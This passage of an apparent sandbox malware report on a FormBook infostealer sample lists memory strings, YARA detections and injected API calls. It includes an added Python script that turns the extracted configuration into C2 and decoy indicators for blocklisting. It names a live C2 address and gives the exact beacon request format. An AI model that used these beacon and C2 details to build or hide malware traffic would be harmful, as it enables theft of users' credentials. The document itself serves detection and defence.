Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comnic
Source: g1EhgmCqCD.exe, 00000001.00000003.649849949.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.comu
Source: g1EhgmCqCD.exe | String found in binary or memory: http://www.churchsw.org/church-projector-project
Source: g1EhgmCqCD.exe | String found in binary or memory: http://www.churchsw.org/repository/Bibles/
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: g1EhgmCqCD.exe, 00000001.00000003.653172373.0000000005B7E000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html3
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.coma
Source: g1EhgmCqCD.exe, 00000001.00000002.667751786.00000000011E0000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comiona
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: g1EhgmCqCD.exe, 00000001.00000003.649504763.0000000005B98000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/8
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn6
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnH
Source: g1EhgmCqCD.exe, 00000001.00000003.649355538.0000000005B96000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnKr4
Source: g1EhgmCqCD.exe, 00000001.00000003.649286426.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnr
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr-
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.krn
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krcom
Source: g1EhgmCqCD.exe, 00000001.00000003.649163045.0000000005B7A000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krn-u
Source: explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: g1EhgmCqCD.exe, 00000001.00000002.672366570.0000000005C50000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.696302536.000000000B970000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: msiexec.exe, 00000009.00000002.912045913.00000000049E2000.00000004.00000001.sdmp | String found in binary or memory: https://mollysmulligan.com/8u3b/?DzrXY=Q16
Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Creates a DirectInput object (often for capturing keystrokes)
Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
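
Two things in this section matter when turning the report into network indicators. First, every captured request went to a domain from the configuration's decoy list (kayandbernard.com, palomachurch.com, gb-contracting.com and so on, each prefixed with www. and hit on the same /8u3b/ path), while the configured C2, www.cats16.com/8u3b/, never appears in the traffic; FormBook beacons to decoys and the real C2 alike, so a blocklist built only from what the sandbox saw misses the one host that matters, and the Snort hits on 184.168.131.241 and 34.102.136.180 are decoy resolutions at hosting providers rather than attacker infrastructure. Second, the requests carry only Host and Connection headers, which is what the "HTTP GET or POST without a user agent" signature keys on, and both query parameter names (DzrXY and zR-4v) stay fixed while the values change. The type-foundry URLs among the strings (fontbureau.com, carterandcone.com, founder.com.cn, sandoll.co.kr and the rest) are font-file metadata and do not belong in a blocklist. The Python below is an added example, not part of the report: it turns the extracted configuration into host and path indicators and classifies requests reconstructed from the two first "HTTP traffic detected" entries. The decoy list is cut down to the domains that also appear in the traffic; the full list is in the Malware Configuration section.

```python
from urllib.parse import parse_qs, urlsplit

# Configuration as extracted by the sandbox; "decoy" is abbreviated here to the
# domains that also appear in the report's HTTP traffic (full list: Malware Configuration).
FORMBOOK_CONFIG = {
    "C2 list": ["www.cats16.com/8u3b/"],
    "decoy": [
        "kayandbernard.com", "palomachurch.com", "gb-contracting.com",
        "effectivemarketinginc.com", "donelys.com", "timbraunmusician.com",
        "anygivenrunday.com", "2000deal.com", "mollysmulligan.com",
    ],
}

# Constructed from the first two "HTTP traffic detected" entries: request line, the
# only two headers the sample sends, and the 7-byte NUL body shown as Data Raw.
OBSERVED_REQUESTS = [
    b"GET /8u3b/?DzrXY=W0cOTmFEbnIJWZ9bmCGSrxqzq+x0vekMOKZqlI6Zx++4S/b9RAwggujLJglRzC1NYopM"
    b"&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1\r\nHost: www.kayandbernard.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7,
    b"GET /8u3b/?DzrXY=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU4DyS4zVRk0C"
    b"&zR-4v=0v1D8ZZ8otVT4F9P HTTP/1.1\r\nHost: www.palomachurch.com\r\nConnection: close\r\n\r\n"
    + b"\x00" * 7,
]


def normalize_host(host):
    """Lower-case, drop a port and a leading 'www.' so config entries and Host headers compare equal."""
    host = host.lower().split(":")[0]
    return host[4:] if host.startswith("www.") else host


def indicators(config):
    """Split a FormBook config into (c2_hosts, decoy_hosts, uri_paths)."""
    c2_hosts, paths = set(), set()
    for entry in config["C2 list"]:
        parts = urlsplit("http://" + entry)  # entries carry no scheme
        c2_hosts.add(normalize_host(parts.netloc))
        paths.add(parts.path)
    decoys = {normalize_host(d) for d in config["decoy"]}
    return c2_hosts, decoys, paths


def parse_request(raw):
    """Minimal HTTP/1.x request parser: (method, path, query dict, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    return method, parts.path, parse_qs(parts.query), headers, body


def classify(config, raw_requests):
    """Label each request as c2 / decoy / unrelated against the config and record
    the traits the sandbox signatures key on (path, missing User-Agent, parameter names)."""
    c2_hosts, decoys, paths = indicators(config)
    results = []
    for raw in raw_requests:
        _method, path, query, headers, body = parse_request(raw)
        host = normalize_host(headers.get("host", ""))
        label = "c2" if host in c2_hosts else "decoy" if host in decoys else "unrelated"
        results.append({
            "host": host,
            "label": label,
            "path_matches_config": path in paths,
            "has_user_agent": "user-agent" in headers,
            "query_keys": sorted(query),
            "body_len": len(body),
        })
    return results


if __name__ == "__main__":
    print("block:", sorted(indicators(FORMBOOK_CONFIG)[0]), indicators(FORMBOOK_CONFIG)[2])
    for r in classify(FORMBOOK_CONFIG, OBSERVED_REQUESTS):
        print(r)
```

Both observed requests classify as decoy with the configured path and no User-Agent; a request to www.cats16.com on the same path would classify as c2. For a proxy or DNS rule, take the c2 host set from indicators() and match the path together with the absent User-Agent, since the decoys are ordinary registered domains that legitimate clients may also reach.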

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418392 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9560 NtWriteFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA770 NtOpenThread,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C96D0 NtCreateKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E81B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8260 NtReadFile,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E82E0 NtClose,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8392 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CAB264
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CAC2B0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CA9990
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CADF71
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_04F77B3C
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_04F7A2D6
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041B944
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041BB84
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00408C4B
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00408C50
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041BCF5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041C5ED
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041B70F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019B2581
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A525DD
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199D5E0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0198F900
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52D07
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01980D20
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019A4120
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A51D55
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199B090
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A520A8
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019B20A0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A528EC
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199841F
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A41002
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019BEBB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A51FF1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A4DBD2
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52B28
